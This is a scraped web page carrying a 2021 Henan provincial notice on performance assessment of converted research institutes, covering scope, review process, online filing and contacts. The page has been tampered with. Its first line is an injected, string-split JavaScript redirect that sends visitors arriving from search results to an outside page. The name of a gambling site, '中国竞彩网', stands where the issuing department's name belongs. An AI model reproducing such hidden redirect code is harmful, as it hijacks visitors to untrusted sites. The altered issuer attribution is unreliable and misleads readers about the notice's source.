var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 通知公告

中国竞彩网 河南省财政厅 关于开展2021年省属转制科研单位绩效考核的通知


发布日期:2021-04-13 15:56来源:资源配置与管理处 阅读次数:

豫科资[2021]15号

各有关单位:

  根据《河南省省级科技基础条件专项资金管理办法》(豫财科〔2016〕52号)、《关于<河南省省级科技基础条件专项资金管理办法>补充调整的通知》(豫财科〔2018〕194号)和《关于组织申报2021年度河南省科技基础条件专项资金项目的通知》(豫科资〔2020〕52号)有关要求,决定组织开展2021年省属转制科研单位绩效考核工作。现将有关事项通知如下:

  一、考核范围

  省科技厅归口管理的省属转制科研单位、省科研生产试验基地入驻单位。

  二、考核内容

  重点对单位2020年度创新发展能力、人才队伍建设、科技成果转化及产业化、经济社会效益、支撑服务全省科技创新重大任务等方面情况进行考核。

  三、考核流程

  (一)单位自评。各单位依据2020年度工作情况进行自我评价,填报《河南省省属转制科研单位绩效考核表》(见附件),并提供反映单位发展绩效情况的相关佐证材料。其中,省科技厅归口管理的省属转制科研单位考核单位整体发展情况;其他基地入驻单位,仅考核入驻基地部分,单位在基地外产生的各项指标不得纳入填报范围。

  (二)专家评审。省科技厅、财政厅联合组织技术、财务和管理专家组成专家组,采取会议评审和现场考察相结合的方式进行考核评价。

  (三)绩效应用。省科技厅、财政厅根据专项资金预算,结合绩效评价结果,研究确定奖补资金。

  四、材料报送要求

  为减轻科研人员和申报单位负担,材料实行网上申报,申报时暂不报送纸质件。待奖补资金公示后,拟获支持单位报备纸质件,未获支持单位无需报送。

  (一)网上申报。进入“河南省科技计划管理信息系统http://xt.hnkjt.gov.cn/”后,点击登陆“河南省科技基础条件平台”,下载模板并填写绩效考核表,按要求提交相关材料及附件。申报流程详见系统首页——《系统使用手册》。网上填报截止时间:5月12日17:30(系统将在申报截止时间关闭)。

  (二)纸质材料报备。纸质材料一式2份,按照封面、目录及页码、绩效考核表、佐证材料附件的顺序胶装成册,加盖公章。报备地点:郑州市政六街3号(政六街纬五路口)河南省科学技术信息研究院2号楼2层。报备时间另行通知。

  五、联系方式

  省科学技术信息研究院

  唐玮罡 0371-61656112

  邮箱:hnstixxy@163.com

  省科技厅 张 磊 0371-86561692

  省财政厅 丁军锋 0371-65802522

  附件:河南省省属转制科研单位绩效考核表

中国竞彩网 河南省财政厅

2021年4月12日